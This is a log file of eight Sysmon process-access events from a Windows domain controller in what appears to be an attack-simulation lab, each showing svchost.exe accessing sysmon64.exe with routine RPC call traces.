{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1579,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1580,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1581,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1582,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1583,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1584,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1585,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1586,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
